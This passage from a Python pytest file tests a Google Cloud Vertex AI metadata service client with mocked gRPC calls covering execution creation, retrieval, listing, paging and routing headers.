# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryContextLineageSubgraphRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
def test_query_context_lineage_subgraph_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
client.query_context_lineage_subgraph()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryContextLineageSubgraphRequest()
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.QueryContextLineageSubgraphRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
response = await client.query_context_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryContextLineageSubgraphRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_async_from_dict():
await test_query_context_lineage_subgraph_async(request_type=dict)
def test_query_context_lineage_subgraph_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryContextLineageSubgraphRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
call.return_value = lineage_subgraph.LineageSubgraph()
client.query_context_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryContextLineageSubgraphRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
await client.query_context_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
def test_query_context_lineage_subgraph_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.query_context_lineage_subgraph(
context="context_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
def test_query_context_lineage_subgraph_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.query_context_lineage_subgraph(
metadata_service.QueryContextLineageSubgraphRequest(),
context="context_value",
)
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            lineage_subgraph.LineageSubgraph()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.query_context_lineage_subgraph(
context="context_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.query_context_lineage_subgraph(
metadata_service.QueryContextLineageSubgraphRequest(),
context="context_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateExecutionRequest,
dict,
],
)
def test_create_execution(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution(
name="name_value",
display_name="display_name_value",
state=gca_execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.create_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == gca_execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_create_execution_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
client.create_execution()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateExecutionRequest()
@pytest.mark.asyncio
async def test_create_execution_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.CreateExecutionRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution(
name="name_value",
display_name="display_name_value",
state=gca_execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.create_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == gca_execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_create_execution_async_from_dict():
await test_create_execution_async(request_type=dict)
def test_create_execution_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateExecutionRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
call.return_value = gca_execution.Execution()
client.create_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_execution_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateExecutionRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution()
)
await client.create_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_execution_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_execution(
parent="parent_value",
execution=gca_execution.Execution(name="name_value"),
execution_id="execution_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].execution
mock_val = gca_execution.Execution(name="name_value")
assert arg == mock_val
arg = args[0].execution_id
mock_val = "execution_id_value"
assert arg == mock_val
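# ``execution_id`` follows the AIP-133 convention: if set, the service uses
# it as the final component of the created resource name (a behavioral note;
# not asserted by these tests).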
def test_create_execution_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_execution(
metadata_service.CreateExecutionRequest(),
parent="parent_value",
execution=gca_execution.Execution(name="name_value"),
execution_id="execution_id_value",
)
@pytest.mark.asyncio
async def test_create_execution_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_execution), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            gca_execution.Execution()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_execution(
parent="parent_value",
execution=gca_execution.Execution(name="name_value"),
execution_id="execution_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].execution
mock_val = gca_execution.Execution(name="name_value")
assert arg == mock_val
arg = args[0].execution_id
mock_val = "execution_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_execution_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_execution(
metadata_service.CreateExecutionRequest(),
parent="parent_value",
execution=gca_execution.Execution(name="name_value"),
execution_id="execution_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetExecutionRequest,
dict,
],
)
def test_get_execution(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = execution.Execution(
name="name_value",
display_name="display_name_value",
state=execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.get_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_get_execution_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
client.get_execution()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetExecutionRequest()
@pytest.mark.asyncio
async def test_get_execution_async(
transport: str = "grpc_asyncio", request_type=metadata_service.GetExecutionRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
execution.Execution(
name="name_value",
display_name="display_name_value",
state=execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.get_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_execution_async_from_dict():
await test_get_execution_async(request_type=dict)
def test_get_execution_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetExecutionRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
call.return_value = execution.Execution()
client.get_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_execution_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetExecutionRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(execution.Execution())
await client.get_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_execution_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = execution.Execution()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_execution(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_execution_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_execution(
metadata_service.GetExecutionRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_execution_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_execution), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(execution.Execution())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_execution(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_execution_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_execution(
metadata_service.GetExecutionRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListExecutionsRequest,
dict,
],
)
def test_list_executions(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListExecutionsResponse(
next_page_token="next_page_token_value",
)
response = client.list_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListExecutionsPager)
assert response.next_page_token == "next_page_token_value"
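# ``ListExecutionsPager`` wraps the first response and lazily fetches
# subsequent pages via ``next_page_token`` as it is iterated; the pager
# tests further below exercise that behavior.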
def test_list_executions_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
client.list_executions()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListExecutionsRequest()
@pytest.mark.asyncio
async def test_list_executions_async(
transport: str = "grpc_asyncio", request_type=metadata_service.ListExecutionsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListExecutionsResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListExecutionsAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_executions_async_from_dict():
await test_list_executions_async(request_type=dict)
def test_list_executions_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListExecutionsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
call.return_value = metadata_service.ListExecutionsResponse()
client.list_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_executions_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListExecutionsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListExecutionsResponse()
)
await client.list_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_executions_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListExecutionsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_executions(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_executions_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_executions(
metadata_service.ListExecutionsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_executions_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            metadata_service.ListExecutionsResponse()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_executions(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_executions_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_executions(
metadata_service.ListExecutionsRequest(),
parent="parent_value",
)
def test_list_executions_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
execution.Execution(),
],
next_page_token="abc",
),
metadata_service.ListExecutionsResponse(
executions=[],
next_page_token="def",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
],
next_page_token="ghi",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
],
),
RuntimeError,
)
        # The pager should carry the routing metadata derived from the
        # request's (empty) ``parent`` field.
        expected_metadata = (
            gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
        )
        pager = client.list_executions(request={})
        assert pager._metadata == expected_metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, execution.Execution) for i in results)
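# For reference, a non-mocked caller consumes the pager by simple iteration;
# the parent below is a hypothetical placeholder resource name:
#
#   for execution in client.list_executions(
#       parent="projects/my-project/locations/us-central1/metadataStores/default"
#   ):
#       ...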
def test_list_executions_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_executions), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
execution.Execution(),
],
next_page_token="abc",
),
metadata_service.ListExecutionsResponse(
executions=[],
next_page_token="def",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
],
next_page_token="ghi",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
],
),
RuntimeError,
)
pages = list(client.list_executions(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
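# Iterating ``.pages`` yields the raw ``ListExecutionsResponse`` messages,
# whereas iterating the pager itself yields individual ``Execution`` items.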
@pytest.mark.asyncio
async def test_list_executions_async_pager():
client = MetadataServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_executions), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
execution.Execution(),
],
next_page_token="abc",
),
metadata_service.ListExecutionsResponse(
executions=[],
next_page_token="def",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
],
next_page_token="ghi",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
],
),
RuntimeError,
)
async_pager = await client.list_executions(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, execution.Execution) for i in responses)
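# For reference (a sketch; ``async_client`` stands for any
# MetadataServiceAsyncClient): the async pager is awaited once, then consumed
# with ``async for``:
#
#   async_pager = await async_client.list_executions(request={})
#   async for execution in async_pager:
#       ...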
@pytest.mark.asyncio
async def test_list_executions_async_pages():
client = MetadataServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_executions), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
execution.Execution(),
],
next_page_token="abc",
),
metadata_service.ListExecutionsResponse(
executions=[],
next_page_token="def",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
],
next_page_token="ghi",
),
metadata_service.ListExecutionsResponse(
executions=[
execution.Execution(),
execution.Execution(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_executions(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type",
[
metadata_service.UpdateExecutionRequest,
dict,
],
)
def test_update_execution(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution(
name="name_value",
display_name="display_name_value",
state=gca_execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.update_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == gca_execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_update_execution_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
client.update_execution()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateExecutionRequest()
@pytest.mark.asyncio
async def test_update_execution_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.UpdateExecutionRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
